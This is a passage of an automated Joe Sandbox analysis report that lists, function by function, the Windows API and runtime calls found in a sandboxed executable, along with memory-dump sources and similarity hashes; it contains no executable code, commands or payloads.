                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0098755E
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00987565
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00987578
                                          • SelectObject.GDI32(00000000,00000000), ref: 00987580
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0098758B
                                          • DeleteDC.GDI32(00000000), ref: 00987594
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0098759E
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009875B2
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009875BE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: c0152d1acc3e7d6ecf38e3cb0fb4b9feb6a5f8eededba8a6566f44272eb570a4
                                          • Instruction ID: 39f2978bca634a6f9d5836fff0051af512affb39eb5234791786b4eb314a8cfd
                                          • Opcode Fuzzy Hash: c0152d1acc3e7d6ecf38e3cb0fb4b9feb6a5f8eededba8a6566f44272eb570a4
                                          • Instruction Fuzzy Hash: A8316D32118218BBDF11AFA4DC08FDB7B69FF49320F210224FA15D62A0D735D811EBA4
                                          APIs
                                          • _memset.LIBCMT ref: 00926E3E
                                            • Part of subcall function 00928B28: __getptd_noexit.LIBCMT ref: 00928B28
                                          • __gmtime64_s.LIBCMT ref: 00926ED7
                                          • __gmtime64_s.LIBCMT ref: 00926F0D
                                          • __gmtime64_s.LIBCMT ref: 00926F2A
                                          • __allrem.LIBCMT ref: 00926F80
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00926F9C
                                          • __allrem.LIBCMT ref: 00926FB3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00926FD1
                                          • __allrem.LIBCMT ref: 00926FE8
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00927006
                                          • __invoke_watson.LIBCMT ref: 00927077
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                          • Instruction ID: 70abe175c96e94e09e6f2edeb499a300f8f9f17cf85aa7e547ab5aa67d971f98
                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                          • Instruction Fuzzy Hash: 1F711776A40727ABDB14EF78EC41B9AB7A8AF44320F148239F414E76C5E770ED148B90
                                          APIs
                                          • _memset.LIBCMT ref: 00962542
                                          • GetMenuItemInfoW.USER32(009C5890,000000FF,00000000,00000030), ref: 009625A3
                                          • SetMenuItemInfoW.USER32(009C5890,00000004,00000000,00000030), ref: 009625D9
                                          • Sleep.KERNEL32(000001F4), ref: 009625EB
                                          • GetMenuItemCount.USER32(?), ref: 0096262F
                                          • GetMenuItemID.USER32(?,00000000), ref: 0096264B
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00962675
                                          • GetMenuItemID.USER32(?,?), ref: 009626BA
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00962700
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00962714
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00962735
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 2e0b4952057b3a2328453d419aba4fb9b43b19ce5d41e7731837dc8f91efe852
                                          • Instruction ID: b02d2f9eb115a7d031538aed3a68e04d96e8c3566465168095c089873192a93e
                                          • Opcode Fuzzy Hash: 2e0b4952057b3a2328453d419aba4fb9b43b19ce5d41e7731837dc8f91efe852
                                          • Instruction Fuzzy Hash: 5561AFB0914A49AFDF21CFA4DC98EBE7BBCEB41344F14046AF842A7291D731AD05DB21
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00986FA5
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00986FA8
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00986FCC
                                          • _memset.LIBCMT ref: 00986FDD
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00986FEF
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00987067
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: beec32aa9017c060c4fa9f52273bf3af9dab2f35a6adac0e218eda695b27a7a0
                                          • Instruction ID: cb913d2276d5d4f5b673f8957ac38d057e0604e21a1acdce25e5c599fe7de4d4
                                          • Opcode Fuzzy Hash: beec32aa9017c060c4fa9f52273bf3af9dab2f35a6adac0e218eda695b27a7a0
                                          • Instruction Fuzzy Hash: 16616A75904208AFDB11DFA4CC85FEEB7B8AB49710F240159FA14EB3A1C771AD41DBA0
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00956BBF
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00956C18
                                          • VariantInit.OLEAUT32(?), ref: 00956C2A
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00956C4A
                                          • VariantCopy.OLEAUT32(?,?), ref: 00956C9D
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00956CB1
                                          • VariantClear.OLEAUT32(?), ref: 00956CC6
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00956CD3
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00956CDC
                                          • VariantClear.OLEAUT32(?), ref: 00956CEE
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00956CF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: ed37bf04a62f497f54e948fb9bcc9b22f5e3a8204b887befa6f292c67612772f
                                          • Instruction ID: e13ab8c0e6a0192ff6d8ddbd1ee734ec88a78fe1078eb6e2094816a05995354b
                                          • Opcode Fuzzy Hash: ed37bf04a62f497f54e948fb9bcc9b22f5e3a8204b887befa6f292c67612772f
                                          • Instruction Fuzzy Hash: 82416071A042199FCF00DFA9D858AAEBBB9FF48351F408069ED55E7361CB30A949DF90
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • CoInitialize.OLE32 ref: 00978403
                                          • CoUninitialize.OLE32 ref: 0097840E
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00992BEC,?), ref: 0097846E
                                          • IIDFromString.OLE32(?,?), ref: 009784E1
                                          • VariantInit.OLEAUT32(?), ref: 0097857B
                                          • VariantClear.OLEAUT32(?), ref: 009785DC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: a431f30c5d9e0d5414e10baf3572b67ba29cb47443aead86ff323bcd68e9690a
                                          • Instruction ID: 389c95da6de78627db3542e4656dbf3c0a04d522d37df7cd159b2c3bd423851e
                                          • Opcode Fuzzy Hash: a431f30c5d9e0d5414e10baf3572b67ba29cb47443aead86ff323bcd68e9690a
                                          • Instruction Fuzzy Hash: 2C61B2726483129FC710DF64C84CF6BB7E8AF89754F008859F9899B2A1CB74ED44CB92
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00975793
                                          • inet_addr.WSOCK32(?,?,?), ref: 009757D8
                                          • gethostbyname.WSOCK32(?), ref: 009757E4
                                          • IcmpCreateFile.IPHLPAPI ref: 009757F2
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00975862
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00975878
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009758ED
                                          • WSACleanup.WSOCK32 ref: 009758F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 85b49ef428d52ce04e069301b69baa83b392dcf4829693a20f22fab991a05041
                                          • Instruction ID: 7c4effcee7c4ad2838c1c39d97eb0f2f5b76866f57ef8a90fc5d4dd3b9de7aa2
                                          • Opcode Fuzzy Hash: 85b49ef428d52ce04e069301b69baa83b392dcf4829693a20f22fab991a05041
                                          • Instruction Fuzzy Hash: 6E516F326046009FDB50DF25DC45B6A7BE8EF88720F158969F99ADB2E1DB70E800DB42
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0096B4D0
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0096B546
                                          • GetLastError.KERNEL32 ref: 0096B550
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0096B5BD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 02f2719db898b45de41f167e40f39984fff2ec2f809929089779b2a61d8f19b1
                                          • Instruction ID: 8d6932e19da54e7da9823b6d1f568180a818f68a64b0175056e713294a670195
                                          • Opcode Fuzzy Hash: 02f2719db898b45de41f167e40f39984fff2ec2f809929089779b2a61d8f19b1
                                          • Instruction Fuzzy Hash: 7D316135A00209AFCB00EB68C895FEEB7B8FF89314F144565F516D7291EB719A82CB51
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00959014
                                          • GetDlgCtrlID.USER32 ref: 0095901F
                                          • GetParent.USER32 ref: 0095903B
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0095903E
                                          • GetDlgCtrlID.USER32(?), ref: 00959047
                                          • GetParent.USER32(?), ref: 00959063
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00959066
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: e52c947309e6d67a305a6e664449c7acee3c1f24ccb3c07eb6aebfa530f6e1a6
                                          • Instruction ID: 8707f909ee11ce5296d51796764d52216cd9c8f824835fa27de4a355defec4d5
                                          • Opcode Fuzzy Hash: e52c947309e6d67a305a6e664449c7acee3c1f24ccb3c07eb6aebfa530f6e1a6
                                          • Instruction Fuzzy Hash: 7021A174A10108BFDF05EBA1CC95EFEBB79EF89320F100615B961972E1EB755819DB20
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009590FD
                                          • GetDlgCtrlID.USER32 ref: 00959108
                                          • GetParent.USER32 ref: 00959124
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00959127
                                          • GetDlgCtrlID.USER32(?), ref: 00959130
                                          • GetParent.USER32(?), ref: 0095914C
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0095914F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: b1084ad8c1f4fac1eb9ad72d48059b4633db39e7e190fe745b75061d28999ab3
                                          • Instruction ID: c1fce4a443f073e5d799d85f2d23ec8a593807b361cd02d51634615eaa46dc0f
                                          • Opcode Fuzzy Hash: b1084ad8c1f4fac1eb9ad72d48059b4633db39e7e190fe745b75061d28999ab3
                                          • Instruction Fuzzy Hash: 1421A174A04108BFDF01EBA5CC95EFEBB69EF84311F104515B911972E1EB755819DB20
                                          APIs
                                          • GetParent.USER32 ref: 0095916F
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00959184
                                          • _wcscmp.LIBCMT ref: 00959196
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00959211
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: ae11d7437aa6909a6de3b12ca70aee106288567c07ff4055024caad1fe61ae28
                                          • Instruction ID: 2562bd6e39a611a3f3b5a04179d78f2ecb9ada38818cbe2f835646ca07b747ac
                                          • Opcode Fuzzy Hash: ae11d7437aa6909a6de3b12ca70aee106288567c07ff4055024caad1fe61ae28
                                          • Instruction Fuzzy Hash: 5111593624C317FAFA106725EC0AEEB779CDB91735F200126FD10E00D5FE6168156B90
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 009788D7
                                          • CoInitialize.OLE32(00000000), ref: 00978904
                                          • CoUninitialize.OLE32 ref: 0097890E
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00978A0E
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00978B3B
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00992C0C), ref: 00978B6F
                                          • CoGetObject.OLE32(?,00000000,00992C0C,?), ref: 00978B92
                                          • SetErrorMode.KERNEL32(00000000), ref: 00978BA5
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00978C25
                                          • VariantClear.OLEAUT32(?), ref: 00978C35
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID:
                                          • API String ID: 2395222682-0
                                          • Opcode ID: 9fed46df93ee2b5cac96368a91b3b7940dbf0dc153c95efc3d616302984ea285
                                          • Instruction ID: 821644b2fe98d74d116a86b99382ca597135de49f1da362f9bbc13ebded8d5e5
                                          • Opcode Fuzzy Hash: 9fed46df93ee2b5cac96368a91b3b7940dbf0dc153c95efc3d616302984ea285
                                          • Instruction Fuzzy Hash: A4C118B1608305AFD700DF64C888A2BB7E9FF89748F00895DF98A9B251DB71ED05CB52
                                          APIs
                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00967A6C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ArraySafeVartype
                                          • String ID:
                                          • API String ID: 1725837607-0
                                          • Opcode ID: 298aa56f0c2cd803265027d828551c6fdee482e9c0c37dd3986ee76452deae87
                                          • Instruction ID: 6a0167f65848316b6f9bd5dad8d0da4992ecf0000ff3cbb7e9dbddc2ef0bd41a
                                          • Opcode Fuzzy Hash: 298aa56f0c2cd803265027d828551c6fdee482e9c0c37dd3986ee76452deae87
                                          • Instruction Fuzzy Hash: 6EB18D7190821A9FDB00DFE4C885BBEB7B8EF49329F204469E541EB391D738A941DB90
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 009611F0
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00960268,?,00000001), ref: 00961204
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0096120B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00960268,?,00000001), ref: 0096121A
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0096122C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00960268,?,00000001), ref: 00961245
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00960268,?,00000001), ref: 00961257
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00960268,?,00000001), ref: 0096129C
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00960268,?,00000001), ref: 009612B1
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00960268,?,00000001), ref: 009612BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 42df8b8a45c0957bd6d64e60a9714ba3e7acc02411e326ed4345a0c8ed43ba1b
                                          • Instruction ID: 5629dca3462d7ee4be2ff69b958caa4d3dadeee9f6a83bd15010a6d1b7540d2d
                                          • Opcode Fuzzy Hash: 42df8b8a45c0957bd6d64e60a9714ba3e7acc02411e326ed4345a0c8ed43ba1b
                                          • Instruction Fuzzy Hash: 3E31E175A28208FFDB109F54ECA8F6A37ADEF54315F144229FD10C62A0D7749D80AB60
                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0090FAA6
                                          • OleUninitialize.OLE32(?,00000000), ref: 0090FB45
                                          • UnregisterHotKey.USER32(?), ref: 0090FC9C
                                          • DestroyWindow.USER32(?), ref: 009445D6
                                          • FreeLibrary.KERNEL32(?), ref: 0094463B
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00944668
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 469580280-3243417748
                                          • Opcode ID: cc7b53bdcaf17d3b60d9c1370d0476d608c6ddd3d3ac68dcbd5ccde5d982ddf7
                                          • Instruction ID: 189ba550f8031286e1f01034936ec0c52ca4221e1d4e4f895b3b40ee13a3c6d1
